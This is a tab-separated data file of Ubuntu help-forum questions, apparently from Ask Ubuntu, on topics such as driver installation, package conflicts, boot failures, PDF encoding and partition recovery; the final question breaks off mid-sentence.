221009	adding a new user on ubuntu server	i have been trying to add a new user . i typed in adduser then username and also tried useradd then username . it does seem to add a user , but when i login i only get a dollar sign instead of user @ servername . i have tried adding rules to allow me into the sudo for that username , but why do i only get the dollar sign ?
221010	ubuntu on mac mini and refit	i have successfully installed ubuntu pangolin 64 bit on a mac mini 2011 5,3 ( server version ) . i have used the ubuntu iso which i then converted to .dmg and dd'ed into an usb stick . i did n't want to keep os x installed so i deleted the current partition and reformatted the drive as ext4 for / + a small swap partition . everything seems to work nicely , but i have now a question since i read lots of reviews/howto when you people installed refit on mac os x . did you use refit to be able to have a dual boot or there are other advantages by doing that ( apart that you will be able to download updated firmware for your hardware in the future via mac os ) like bios emulation and the like ?
221016	install 32-bit gstreamer plugins on 64-bit	i am trying to install the 32-bit gstreamer plugins on my 64-bit system ( ubuntu 12.10 based ) . i can install the packages gstreamer0.10-plugins-base : i386 and gstreamer0.10-plugins-good : i386 . however , gstreamer0.10-plugins-bad : i386 , gstreamer0.10-plugins-bad-multiverse : i386 and gstreamer0.10-plugins-ugly : i386 conflict with 64-bit packages already installed on my system : $ sudo apt-get install gstreamer0.10-plugins-bad : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gstreamer0.10-plugins-bad : i386 : depends : libass4 : i386 ( > = 0.9.7 ) but it is not going to be installed depends : libdca0 : i386 but it is not going to be installed depends : libdvdnav4 : i386 ( > = 4.2.0+20120524 ) but it is not going to be installed depends : libdvdread4 : i386 but it is not going to be installed depends : libslv2-9 : i386 ( > = 0.6.4-1~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . ... $ sudo apt-get install gstreamer0.10-plugins-bad-multiverse : i386 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libavcodec53 : i386 libavutil51 : i386 libfaac0 : i386 libfaad2 : i386 libgsm1 : i386 libmjpegtools-1.9 : i386 libmp3lame0 : i386 libquicktime2 : i386 libschroedinger-1.0-0 : i386 libswscale2 : i386 libva1 : i386 libvpx1 : i386 libx264-123 : i386 libxvidcore4 : i386 the following packages will be removed : gstreamer0.10-plugins-bad-multiverse libfaac0 libmjpegtools-1.9 mint-meta-codecs the following new packages will be installed : gstreamer0.10-plugins-bad-multiverse : i386 libavcodec53 : i386 libavutil51 : i386 libfaac0 : i386 libfaad2 : i386 libgsm1 : i386 libmjpegtools-1.9 : i386 libmp3lame0 : i386 libquicktime2 : i386 libschroedinger-1.0-0 : i386 libswscale2 : i386 libva1 : i386 libvpx1 : i386 libx264-123 : i386 libxvidcore4 : i386 0 upgraded , 15 newly installed , 4 to remove and 5 not upgraded . need to get 9,198 kb of archives . after this operation , 23.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? ... $ sudo apt-get install gstreamer0.10-plugins-ugly : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gstreamer0.10-plugins-ugly : i386 : depends : libdvdread4 : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . this means that i ca n't play mp3s ( among other things ) in 32-bit applications that use gstreamer . is there a way around this ?
221018	python 2.4 on ubuntu 12.04	i want to develop a python application on ubuntu 12.04 using python 2.4 , but since the default version of python on ubuntu is 2.7 . i can not get the libraries and packages to work for python 2.4 . i have tried using virtualenv but even with virtualenv i was not successful in installing packages for python2.4 . so i would like to know if there is any reliable method to get python 2.4 to work with ubuntu . i know that i shouldnt mess with the default version of python on ubuntu and hence i am looking for a better alternative . thanks in advance .
221020	how can i read the sourcecode of a pdf	i want get the sourcecode of a pdf file . unfortunately once i open the pdf with a texteditor some lines does n't make sense ... just like ... . % pdf-1.6 % âãïó 3 0 obj < < /ff 0/f 6/type/annot/subtype/widget/dr < < /font < < /helv 2 0 r > > > > /t ( ä\n¬4^xè4ýæço§w²w^d³^ywzº < 92 > õì^aàäi ] â < 96 > < 8c > ) /v ( ä\n¬4^xè4ýæço§w²w^dø < 93 > r^d¥à < 82 > ú < 83 > z^q7^cv^fè ) /ap < < /n 1 0 r > > /p 4 0 r/bs < < /w 1/s/s > > /ft/tx/rect [ 40 50 70 80 ] /da ( ä\n¬4^xè4ýæço§w²w^dù~êw3 < 84 > & ^x´âl|q @ ³^vc < 8a > '' ýo^n¿=ì < 91 > ta^r`àz ) > > endobj 6 0 obj so % pdf-1.6 is fine but after it s not resolving the correct letters ... . i tried with vim ... is there any chance to get the correct content ... .
221021	nvidia gt 220 not working properly with ubuntu 12.10	i used to enable proprietary nvidia drivers on every previous ubuntu release to get it working properly ( otherwise i was stuck with very low resolution and no graphic acceleration ) . in particular , i noticed that the gpu fan runs at high speed all the time unless the video drivers are installed . today i installed 12.10 . running the live cd , surprisingly , everything was working fine : full resolution , acceleration , silent fan , and so on . the running driver was nvidia-current ( gt 216 ) . after installing and booting , i found that the fan was spinning too fast . the installed driver is nouveau . i tried installing nvidia-current , or any other proprietary driver , even installing the kernel headers & source and then the drivers ( as suggested in nvidia driver does n't work in 12.10 ) - but the proprietary drivers are not working . now , unity and compiz refuse to start , low resolution , no acceleration , and fan on high . does anybody how to get the proprietary drivers working from here ?
221023	java problems installing glassfish 3.1.2 on ubuntu lucid	i 'm trying to install glassfish v3.1.2 on ubuntu 10.04 by obtaining corresponding .sh from oracle website and running sudo ./glassfish-installer-file.sh . however following error appears : could not locate a suitable jar utility . please ensure that you have java 6 or newer installed on your system and accessible in your path or by setting java_home the problem is that $ java_home ( and also $ jdk_home which i think is superfluous ) is being correctly set in ~/.bashrc file : export java_home=/usr/lib/jvm/java export jdk_home=/usr/lib/jvm/java path= $ { path } : $ { java_home } /bin : so-on and it 's possible to execute all programs from $ java_home/bin directory from console ( including jar program ) . now , what i noticed is that some time ago i installed java , javac and javaws specifically using sudo update-alternatives -- install ... command into /usr/lib/bin folder . so i tried to install jar in the same way ( using sudo update-alternatives -- install `` /usr/bin/jar '' `` jar '' `` /usr/lib/jvm/jdk1.6.0_35/bin/jar '' 1 ) and the initial problem was solved - above error did n't appear when i tried to install glassfish again . but another problem appeared - it looks like during installation gf installer could n't find keytool program this time . i 'm not very happy with installing several dozens of programs from java bin folder , so the main question is : is there significant difference from the point of view of other programs ( like glassfish installer ) between : installing some program using sudo update-alternatives -- install /usr/bin/program-name program-name /path/to/program-name 1 and simply adding it to $ path variable ? or this can be considered as bug in glassfish installer ? thanks in advance
221025	black screen when booting ubuntu on win7	i am using win7 64 right now . and i want to install an ubuntu on win7 . i follow the instruction of wubi . and i assume it can install the ubunt automatically for me . but after installing it and rebooting the computer . i can not access into ubuntu . the computer just stays in the black screen . how can i fix the problem ?
221026	how can i batch extract audio from mp4 files with ffmpeg without decompression ( automatic audio codec detection ) ?	i have 228 mp4 files ( 2.6gb ) and would like to extract audio from them ( mp3 or ogg ) . i want to batch extract them - preferably with bash . i 'm not sure if all files use the same audio codec as they were recorded in different years , ranging from 2006-2012 . i want to loop through all of them , pick the file name , detect audio codec and use ffmpeg to extract the audio . is it possible ?
221027	says `` boot : '' when booting the ubuntu 12 04 install from usb flashdrive	i had ubuntu installed , but my netbook did not support new gnome graphics on ubuntu , so i tried installing fedora which did support gnome look . however , then i saw that it was not without reason that ubuntu did not support it for my netbook . it was laggy ant slow . now i 'm trying to install ubuntu again , however when i try to boot from usb flash drive , it says `` boot : '' and when i type anything and hit enter it says `` could not find kernel image : `` . what should i do in order to get ubuntu installed again ?
221031	ubuntu 12.04 lts hangs ramdonly	i have a installed ubuntu server 12.04.1 lts on a hewlett-packard compaq 8200 elite her specs are : intel ( r ) core ( tm ) i5-2400 cpu @ 3.10ghz 8gb ram ddr3 1333mhz this machine have a installed zimbra 8.0.0.ga.5434.ubuntu12.64 ubuntu12_64 foss edition . on average every 2 days to the machine you get messages like nov 23 04:00:06 backup-xen kernel : [ 37356.110693 ] bug : soft lockup - cpu # 1 stuck for 22s ! [ zmconfigdctl:24549 ] nov 23 04:00:06 backup-xen kernel : [ 37356.110728 ] modules linked in : nls_iso8859_1 nls_cp437 vfat fat ext2 snd_hda_codec_hdmi snd_hda_codec_realtek tpm_infineon usbhid hid ppdev hp_wmi sparse_keymap snd_hda_intel snd_hda_codec snd_hwdep snd_pcm parport_pc dm_multipath snd_seq_midi wmi psmouse tpm_tis mac_hid serio_raw snd_rawmidi snd_seq_midi_event snd_seq i915 snd_timer snd_seq_device drm_kms_helper snd drm i2c_algo_bit mei ( c ) video soundcore snd_page_alloc lp parport e1000e nov 23 04:00:06 backup-xen kernel : [ 37356.110767 ] cpu 1 nov 23 04:00:06 backup-xen kernel : [ 37356.110768 ] modules linked in : nls_iso8859_1 nls_cp437 vfat fat ext2 snd_hda_codec_hdmi snd_hda_codec_realtek tpm_infineon usbhid hid ppdev hp_wmi sparse_keymap snd_hda_intel snd_hda_codec snd_hwdep snd_pcm parport_pc dm_multipath snd_seq_midi wmi psmouse tpm_tis mac_hid serio_raw snd_rawmidi snd_seq_midi_event snd_seq i915 snd_timer snd_seq_device drm_kms_helper snd drm i2c_algo_bit mei ( c ) video soundcore snd_page_alloc lp parport e1000e nov 23 04:00:06 backup-xen kernel : [ 37356.110783 ] nov 23 04:00:06 backup-xen kernel : [ 37356.110784 ] pid : 24549 , comm : zmconfigdctl tainted : g wc 3.2.0-33-generic # 52-ubuntu hewlett-packard hp compaq 8200 elite sff pc/1495 nov 23 04:00:06 backup-xen kernel : [ 37356.110787 ] rip : 0010 : [ < ffffffff8103dc62 > ] [ < ffffffff8103dc62 > ] __ticket_spin_lock+0x22/0x30 nov 23 04:00:06 backup-xen kernel : [ 37356.110791 ] rsp : 0018 : ffff88010ec03c58 eflags : 00000293 nov 23 04:00:06 backup-xen kernel : [ 37356.110792 ] rax : 0000000000008801 rbx : 3736392e39333835 rcx : ffff88010ec03fd8 nov 23 04:00:06 backup-xen kernel : [ 37356.110794 ] rdx : 000000000000ffff rsi : ffff8801f9d3c738 rdi : ffff8801f9d3c724 nov 23 04:00:06 backup-xen kernel : [ 37356.110795 ] rbp : ffff88010ec03c58 r08 : 000000000000000a r09 : 0000000000000000 nov 23 04:00:06 backup-xen kernel : [ 37356.110796 ] r10 : 0000000000000000 r11 : 0000000000000000 r12 : ffff88010ec03bdd nov 23 04:00:06 backup-xen kernel : [ 37356.110798 ] r13 : 0000000f00000001 r14 : 0000000000000246 r15 : ffff88010ec03bdc nov 23 04:00:06 backup-xen kernel : [ 37356.110799 ] fs : 0000000000000000 ( 0000 ) gs : ffff88022e280000 ( 0000 ) knlgs:0000000000000000 nov 23 04:00:06 backup-xen kernel : [ 37356.110800 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 nov 23 04:00:06 backup-xen kernel : [ 37356.110802 ] cr2 : 00007f6eb61a2f50 cr3 : 00000001fa7e7000 cr4 : 00000000000406e0 nov 23 04:00:06 backup-xen kernel : [ 37356.110803 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 nov 23 04:00:06 backup-xen kernel : [ 37356.110804 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000400 nov 23 04:00:06 backup-xen kernel : [ 37356.110813 ] process zmconfigdctl ( pid : 24549 , threadinfo ffff88010ec02000 , task ffff8801fa5b1700 ) nov 23 04:00:06 backup-xen kernel : [ 37356.110814 ] stack : nov 23 04:00:06 backup-xen kernel : [ 37356.110831 ] ffff88010ec03c68 ffffffff8165b00e ffff88010ec03cd8 ffffffff81659ec6 nov 23 04:00:06 backup-xen kernel : [ 37356.110836 ] 0000000000000000 0000000000000001 000000000000000a 0000000000000000 nov 23 04:00:06 backup-xen kernel : [ 37356.110840 ] ffff88010ec03ca8 0000000000000009 ffff88010ec03ce8 ffff8801f9d3c720 nov 23 04:00:06 backup-xen kernel : [ 37356.110845 ] call trace : nov 23 04:00:06 backup-xen kernel : [ 37356.110861 ] [ < ffffffff8165b00e > ] _raw_spin_lock+0xe/0x20 nov 23 04:00:06 backup-xen kernel : [ 37356.110864 ] [ < ffffffff81659ec6 > ] __mutex_lock_slowpath+0x96/0x150 nov 23 04:00:06 backup-xen kernel : [ 37356.110868 ] [ < ffffffff81659b1a > ] mutex_lock+0x2a/0x50 nov 23 04:00:06 backup-xen kernel : [ 37356.110873 ] [ < ffffffff81148470 > ] unlink_anon_vmas+0x70/0x1d0 nov 23 04:00:06 backup-xen kernel : [ 37356.110877 ] [ < ffffffff8113af4c > ] free_pgtables+0xac/0x120 nov 23 04:00:06 backup-xen kernel : [ 37356.110882 ] [ < ffffffff81144536 > ] exit_mmap+0xc6/0x140 nov 23 04:00:06 backup-xen kernel : [ 37356.110886 ] [ < ffffffff81064bd2 > ] mmput.part.16+0x42/0x130 nov 23 04:00:06 backup-xen kernel : [ 37356.110890 ] [ < ffffffff81064ce9 > ] mmput+0x29/0x30 nov 23 04:00:06 backup-xen kernel : [ 37356.110894 ] [ < ffffffff8106b643 > ] exit_mm+0x113/0x130 nov 23 04:00:06 backup-xen kernel : [ 37356.110898 ] [ < ffffffff810e40c5 > ] ? taskstats_exit+0x45/0x240 nov 23 04:00:06 backup-xen kernel : [ 37356.110902 ] [ < ffffffff8165b2f5 > ] ? _raw_spin_lock_irq+0x15/0x20 nov 23 04:00:06 backup-xen kernel : [ 37356.110906 ] [ < ffffffff8106b7ce > ] do_exit+0x16e/0x450 nov 23 04:00:06 backup-xen kernel : [ 37356.110910 ] [ < ffffffff8106bc54 > ] do_group_exit+0x44/0xa0 nov 23 04:00:06 backup-xen kernel : [ 37356.110914 ] [ < ffffffff8106bcc7 > ] sys_exit_group+0x17/0x20 nov 23 04:00:06 backup-xen kernel : [ 37356.110918 ] [ < ffffffff81663602 > ] system_call_fastpath+0x16/0x1b nov 23 04:00:06 backup-xen kernel : [ 37356.110921 ] code : 90 90 90 90 90 90 90 90 90 55 b8 00 00 01 00 48 89 e5 f0 0f c1 07 89 c2 c1 ea 10 66 39 c2 74 13 66 0f 1f 84 00 00 00 00 00 f3 90 < 0f > b7 07 66 39 d0 75 f6 5d c3 0f 1f 40 00 8b 17 55 31 c0 48 89 nov 23 04:00:06 backup-xen kernel : [ 37356.111087 ] call trace : nov 23 04:00:06 backup-xen kernel : [ 37356.111090 ] [ < ffffffff8165b00e > ] _raw_spin_lock+0xe/0x20 nov 23 04:00:06 backup-xen kernel : [ 37356.111093 ] [ < ffffffff81659ec6 > ] __mutex_lock_slowpath+0x96/0x150 nov 23 04:00:06 backup-xen kernel : [ 37356.111097 ] [ < ffffffff81659b1a > ] mutex_lock+0x2a/0x50 nov 23 04:00:06 backup-xen kernel : [ 37356.111101 ] [ < ffffffff81148470 > ] unlink_anon_vmas+0x70/0x1d0 nov 23 04:00:06 backup-xen kernel : [ 37356.111104 ] [ < ffffffff8113af4c > ] free_pgtables+0xac/0x120 nov 23 04:00:06 backup-xen kernel : [ 37356.111109 ] [ < ffffffff81144536 > ] exit_mmap+0xc6/0x140 nov 23 04:00:06 backup-xen kernel : [ 37356.111112 ] [ < ffffffff81064bd2 > ] mmput.part.16+0x42/0x130 nov 23 04:00:06 backup-xen kernel : [ 37356.111115 ] [ < ffffffff81064ce9 > ] mmput+0x29/0x30 nov 23 04:00:06 backup-xen kernel : [ 37356.111119 ] [ < ffffffff8106b643 > ] exit_mm+0x113/0x130 nov 23 04:00:06 backup-xen kernel : [ 37356.111123 ] [ < ffffffff810e40c5 > ] ? taskstats_exit+0x45/0x240 nov 23 04:00:06 backup-xen kernel : [ 37356.111126 ] [ < ffffffff8165b2f5 > ] ? _raw_spin_lock_irq+0x15/0x20 nov 23 04:00:06 backup-xen kernel : [ 37356.111130 ] [ < ffffffff8106b7ce > ] do_exit+0x16e/0x450 nov 23 04:00:06 backup-xen kernel : [ 37356.111134 ] [ < ffffffff8106bc54 > ] do_group_exit+0x44/0xa0 nov 23 04:00:06 backup-xen kernel : [ 37356.111138 ] [ < ffffffff8106bcc7 > ] sys_exit_group+0x17/0x20 nov 23 04:00:06 backup-xen kernel : [ 37356.111142 ] [ < ffffffff81663602 > ] system_call_fastpath+0x16/0x1b after a number of similar messages the machine regularly ends in a kernel panic or just freezes . truth is not to do , something similar happens when i use another machine identical when using virtualbox . what is the reason for this behavior ?
221033	edit shortcut list window displayed through super-key pressing	when i long press super key in ubuntu , it 's displayed a list of keyboard shortcuts used in unity . i would like to know if it 's possible to edit the content of this window to display something different of keyboard shortcuts ( for example codes used in my job that i use often ) . is the content of keyboard shortcuts windows stored in some text file ? or is it stored as a image ? would i be able to edit it to display anything i want ?
221036	ubuntu wo n't boot from usb stick	i followed the instructions exactly to install ubuntu desktop 12.10 on a usb stick , then make it bootable with linuxlive , but when i rebooted , nothing happened-it simple booted into the normal windows 7 . i made the usb first in the boot order , booted from the stick with the boot menu itself , but still nothing . i also tried using unetbootin instead of linuxlive , but neither worked . what did i do wrong ?
221038	problem with update	when i try to update and type : sudo apt-get update i get this error e : problem executing scripts apt : :update : :post-invoke-success 'test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i' e : sub-process returned an error code
221039	compatibility of acer aspire one 722 with ubuntu 12.10	i was wondering if i can install ubuntu 12.10 on my acer aspire one 722 netbook . it is currently running windows 7 home premium but i want to use ubuntu alongside with it . spesifications : 2 gb ram amd c-60 apu dual core 1.00ghz ati radeon 128mb dedicated graphics
221041	local chat between empathy and telepathy ?	empathy and telepathy , both have local chat , or chat for lan . how configure local chat for obtain communication between empathy and telepathy clients ? clarification : in a lan , one pc use telepathy and other pc use empathy , both have `` nearby people '' or `` local chat '' enabled , but dont appear in chat list . if both uses the same program can change , otherwise not .
221042	how to disable password prompt for default keyring ?	i 'm using ubuntu 12.10 64bit . how to disable ubuntu enter password for keyring default to unlock prompt ? every time i open chrome or ubuntu software center , this annoying window jump out . i have being searching online for a long time , most of the answers are like delete ~/.gnome2/keyring xx , but i do n't have such directory or go to password and keys , disable some option , but this window is empty in my case , very strange , even i add a new password keyring , it is still empty . none of these methods works in my case . i will be very appreciate if you can help
221044	minecraft high cpu ( 125 % ~ ) using openjava 6/7	if i run minecraft with openjdk 6 or 7 on my ubuntu 12.04 machine , it eats nearly of the cpu and i have lags during minecraft gameplay . what i have tried so far : start minecraft with something like java -xmx2044m -xms1024m -jar minecraft.jar using recommended nvdia drivers using latest beta nvidia drivers tested minecraft with both openjava versions ( 6/7 ) switched between unity 2d and unity 3d verified that i am using the latest graphic engine that is used by minecraft ( lwjgl ) my machine is an amd phenom 955x using ubuntu 12.04 with a nvidia gtx 275 until now nothing changed the bad performance of minecraft . suggestions are much appreciated , thank you in advance for any help !
221047	accidentally partitioned over entire hard drive - can not boot	background : i began with a single partition ~72mb , with zorin os 6 installed . yesterday i was following these instructions to move my /home folder to a separate partition . after partitioning ( original partition - ~39mb , new partition - ~33mb ) , however , whenever i try to boot to my zorin 6 installation , i receive a black screen and `` could not write bytes : broken pipe '' , along with other , varying stuff . i continued to follow those instructions from a liveusb of xubuntu 12.10 . it was getting too complicated , however , so i just moved the files i wanted to keep onto the new partition using gksu thunar , and booted into my liveusb to install xubuntu 12.10 over zorin . i started the installer after choosing `` try xubuntu without installing '' , and when it came to the option on how to partition , i chose `` install over zorin 6 '' , and checked the `` use lvm '' option . then i clicked forward , but some error came up . ( i ca n't really remember , i started to panic shortly after this ) when i closed out of the installer and opened gparted to see what had happened , i saw that i had two partitions - a 255mb ext4 , and a new 72 gb `` unknown '' partition , with a flag of `` lvm '' . when i tried to mount the 33 gb partition still listed on my desktop , it was unable to - it received some error of `` not enough space '' . this is where i really started getting frantic - i tried to open the installer again , it would n't , so i shut down , and rebooted the liveusb . this time choosing `` install xubuntu '' - i followed the same steps , and resigned myself that i lost the data , but after selecting the option to erase the whole disk and install . immediately after it said that the installer had encountered an unrecoverable error ; it was going to boot a live desktop so i can see what went wrong and/or to try the installer again . afterwards it just stayed on a black screen . to wrap it up , i have three partitions : ~255mb , type `` unknown '' , no flags ~72 gb , type `` ext4 '' , flag `` lvm '' linux swap question : is there any way i can recover my data without being able to boot the installed os ? i have a considerable amount of music , game data , etc . that i would really not want to lose , so any help is appreciated .
221048	12.04 to 12.10 thunderbird vs evolution	if i upgrade from 12.04 to 12.10 what happens to my evolution ? will i have to use thunderbird or will i have a choice ?
221051	copy french text from pdf file	i have a french thesis which i am trying to read , to better understand some parts i am trying to copy some text and use that in google translate , however if i copy text i am getting just rubbish as the pasted text . most probably there is a problem with the encoding . and even more strangely , i can copy text from the first cover page of the document correctly which is also in french but from the rest , i am just getting a full of rubbish characters from the text that i pasted from the clipboard . any ideas on how to read parts of this thesis ?
221052	installing canon lbp2900b printer in 12.10	i installed canon lbp2900b 's driver from canon 's support page in ubuntu 12.10 . in printers section it is showing my printer as lbp2900 ( not as lbp2900b ) . i can open its properties , can send a command for printing . what 's wrong , however , is that in the printing process , it is shown as processing . suffice it to say that my printer is not working .
221057	how to clone two hard drives into one	lately when running smart tests of my hard drives above shows many errors i read a good number of sectors so i decided to buy a new one . the problem is i do not want to have to reinstall my operating system from 0 ( windows and linux ) so , how ow to clone two 80gb hard drives ( one with windows and one with lubuntu ) into one of 250gb ?
221058	unable to detect hdd from windows 7 bootable disc	i tried making and running live ubuntu zip drive and succeeded but somehow i messed up my previous mbr , hdd drivers , file system or maybe something else while trying to make a dual boot system . now i am able to see my hdd from ubuntu zip drive but windows 7 ( ultimate 64 bit ) which was already installed and running prior to all this started to crash on every boot , also when i tried to repair it , some error came up , then again i tried to boot it from windows 7 bootable disc , its not detecting my hdd , althought i can see my partitions still there with diskpart command from command prompt through that disc . i have a 500gb sata hdd seagate previously it was partitioned as : 700kb 100mb c 63gb d 100gb e 100gb f 197gb now from running command prompt with a bootable win 7 disc and executing diskpart command with select disk 0 and list partition commands i am getting partition 1 700kb partition 2 100mb partition 3 63gb partition 4 437gb ( not exact ) i have some very important data scattered in partitions other than c : which is fully dedicated to windows . so please help/guide me to bring my previous windows 7 back or reinstall it without effecting my data . or if it is not possible please tell how i can erase that 63gb partition and re-install windows 7 from scratch using command prompt since in gui mode my hdd is undetectable . thank you .
221067	how to deactiviate blinking cursor on 12.04	my mouse cursor is blinking frequently when it 's moved , especcially within the system settings application and similar types of windows ( it s also blinking when hovering over the `` post your question '' button below ) . furthermore , the cursor is disappearing while i 'm typing . i remember i was able to deactiviate those things on 10.04 , but i ca n't find ( all ) the option ( s ) on 12.04 . i have already disabled the blinking cursor in system settings - > hardware - > keyboard , but it did not seem to solve the issue completely ( i suspect the option does not get saved after closing the window ) . thanks in advance for any help . edit : this is the output of lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation panther point kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a4 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 )
221070	facebook fonts look weird on firefox in 12.04	i just installed ubuntu 12.04 on this machine and noticed the fonts on facebook.com look very different from how they used to look on 10.04 or windows . they seem to be smaller and `` washed out '' ( hard to describe ) . i have n't noticed this problem on other websites any idea what could cause this problem and how to fix it ? i am using the firefox and always have for many years on different machines . thanks in advance
221076	how to repair the smart data ? is there some programe ?	i already tried but i simply stops at the midle and turns off the computer and does n't solves anything . disk type ext4 .
221078	how do i install a mac os x theme for 12.10 ?	additional details are : i 've tried noobslab mac os x themes versions 1 and 2 , they worked , 'sort of . ' they installed and are operating but they have some problems in as far as readability , which thing they did n't in 12.04 . i 've tried installing macbuntu and it works but it has similar readability problems which were n't present in 12.04 .
221079	how to defrag a disk ? type ext4	i 've read many things but they do n't work . i do n't want any answer saying that there 's no need because there is some not much but some !
221081	permission denied when downloading with transmission deamon	i installed xubuntu and transmission daemon , set the download path to my home/user/tv shows , and get a permission denied when trying to download torrents through transmission . i tried chmod -r 777 on this folder without success . please help ! output of ps -ef | grep transmission chen @ htpc : ~ $ ps -ef | grep transmission 109 1023 1 1 21:46 ? 00:00:35 /usr/bin/transmission-daemon -- config-dir /var/lib/transmission-daemon/info chen @ htpc : ~ $ ps aux | grep transmission 109 1023 3.2 0.4 47684 16620 ? ssl 21:46 1:20 /usr/bin/transmission-daemon -- config-dir /var/lib/transmission-daemon/info chen 1852 0.0 0.0 4200 772 pts/0 s+ 22:27 0:00 grep -- color=auto transmission enter code here
221082	process id from window id	when i run xprop -id < wid > on a given windows id for an opengl application ( ubuntu 12.04 ) i get a bunch of properties , but i do n't see _net_wm_pid ; $ xprop -id 0x4a00002 _net_wm_icon_geometry ( cardinal ) = 0 , 488 , 64 , 65 xklavier_state ( integer ) = 0 , 0 _net_wm_fullscreen_monitors ( cardinal ) = 4294967295 , 1852143205 , 19456 , 1645412352 _net_wm_state ( atom ) = wm_state ( wm_state ) : window state : normal icon window : 0x0 _net_frame_extents ( cardinal ) = 1 , 1 , 28 , 1 _net_wm_desktop ( cardinal ) = 0 _net_wm_allowed_actions ( atom ) = _net_wm_action_move , _net_wm_action_resize , _net_wm_action_fullscreen , _net_wm_action_minimize , _net_wm_action_shade , _net_wm_action_maximize_horz , _net_wm_action_maximize_vert , _net_wm_action_change_desktop , _net_wm_action_close , _net_wm_action_above , _net_wm_action_below wm_protocols ( atom ) : protocols wm_delete_window wm_locale_name ( string ) = `` c '' wm_hints ( wm_hints ) : initial state is normal state . wm_normal_hints ( wm_size_hints ) : user specified location : 50 , 50 user specified size : 640 by 480 wm_client_machine ( string ) = `` gliese-581h '' wm_icon_name ( string ) = `` full-screen & windowed mode '' wm_name ( string ) = `` full-screen & windowed mode '' how do i access the process pid associated to the window id ?
221091	how do i get update manager to update only specific packages from a source ?	i recently added the xorg-edgers source in order to get the latest beta nvidia proprietary drivers . http : //ppa.launchpad.net/xorg-edgers/ppa/ubuntu however , the update manager looks at this source and brings up various linux-images and linux-headers too . i only ever want to update the nvidia drivers from this xorg-edgers source but i would like everything else ( linux headers , image ) to come from the regular sources . is there a way i can accomplish this setup ?
221093	bit copy of encrypted home and other partitions	my laptop is overheating so i need to save all my files before i format the hard drive . i learned how to copy dev/sdx using dd command . however , i am not sure what to copy . picture from gparted here : http : //is.muni.cz/www/256590/fig.png should i copy sda5 and sda6 only ? or sda2 and sda1 ? i do not need to use these data on another disk , i just want to be able to access them - therefore i want to put them on external hard drive . and last question - how i will then mount my encrypted home ? will it work ? thanks a lot !
221094	can not login after removing broken packages	i just updated my ubuntu to the latest version . after updating , everytime i try to remove or add anything , i get this error : errors were encountered while processing : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) package manager notified me that all my gnome packages were broken and i could n't make any updates until i deleted the gnome packages . so , i deleted all the gnome packages . now i can not login anymore , after entering my password , it flashes right back to the login screen .
221097	does zbox ad03 work fine with ubuntu and xbmc ?	i have a zotac zbox ad03 ( bluray ) currently installed with windows . i would like to pass to linux and i would like to try ubuntu . does anybody of you has hints / tips / warning to provide ? is the combination zbox ad03 + ubuntu + xbmc working smoothly ? what about hdmi and bluray interfaces ? are they easily managed and recognized ?
221099	how to limit access to machines by ( ex : library card )	since i saw no blog about this , i thought i would ask for other peoples ' reference . i was wondering if there is a program for ubuntu that does something similar to this : at libraries ( which 99 % of them run windows xp ) they always have this program that asks you for a valid library card number id to access the computers , then it gives you about an hour of computer time before it boots you off . is there a program that replicates the asking of library id , since i know you could use timekpr to time it . thanks : )
221100	configure sticky edges	i 'm using ubuntu 12.04 and like the sticky edges feature on my dual monitor setup ( extra monitor on left ) , but would like to configure it a little less sticky . currently i have to drag about an inch beyond the edge to unstick the cursor . i 'd prefer a little less , say half or a quarter of the default distance . is there a way to configure this `` unstick '' distance ?
221103	shortcut icons on the desktop do not work	my desktop computer has two drives each with two partitions apart from swap , boot . /dev/sda1 has windows xp , programs and some data ; sda2 and sdb1 have only data : sdb2 ( 40gb ) has kubuntu 12.04.01 . after i installed kubuntu some four weeks ago i put five shortcut items on my desktop by : unlock widgets , drag files to desktop corner and select `` icon '' . shortcuta was to a subdirectory on sda1 , b was to a subdirectory on sdb1 , c was to a file on sda1 , d and e were to files on sdb1 . by clicking on the icon , i could open the file in the same way but quicker than navigating through dolphin or other file manager . there are three users ; in kubuntu , only i can access files outside sdb2 . to enable this , lines were added ( partly with help from this forum ) , to etc/fstab : /dev/sda1 /media/windows ntfs-3g defaults , rw , uid=1000 , gid=1000 , umask=0077 0 0 /dev/sda2 /media/temp ntfs-3g defaults , rw , uid=1000 , gid=1000 , umask=0077 0 0 # /dev/sdb1 /media/data ntfs-3g defaults , rw , uid=1000 , gid=1000 , umask=0077 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 because the sdb1 line was commented with # , a spurious mountpoint /media/data_ was created ( in addition to /media/data , and it was necessary to amend the paths on shortcuts b , d and e to get them to work . on eventually uncommenting the command , /media/data_ disappeared , and the shortcuts were deleted . on their reinstatement with corrected paths , shortcutb worked , but d and e did not . a and c have worked throughout . i have also tried 